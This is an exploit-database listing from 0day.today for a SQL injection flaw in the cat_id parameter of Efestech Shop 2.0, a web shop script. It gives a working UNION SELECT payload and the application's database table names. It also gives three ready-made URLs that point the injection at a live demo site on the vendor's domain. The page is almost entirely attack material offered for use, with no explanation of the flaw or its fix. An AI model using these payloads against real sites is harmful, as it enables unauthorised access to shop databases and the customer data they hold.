[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Efestech Shop 2.0 (cat_id) Remote SQL Injection Vulnerability

Author
Kacak
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3339
Category
web applications
Date add
30-06-2008
Platform
unsorted
=============================================================
Efestech Shop 2.0 (cat_id) Remote SQL Injection Vulnerability
=============================================================



Script : Efestech Shop v2.0
Verz: 2.0
 

SQL attack ;

http://target.com/path/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar

Tables;

ayarlar
cat_eng
cat_tr
eng
lisans
mark_eng
mark_tr
product
subcat_eng
subcat_tr
tr
urun_resim

 

###############################################################

Example Bug Site :

http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+ayarlar
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+eng
http://www.efestech.com/demo/shop/?cmd=urunler&cat_id=30+union+select+0+from+tr




#  0day.today [2024-11-15]  #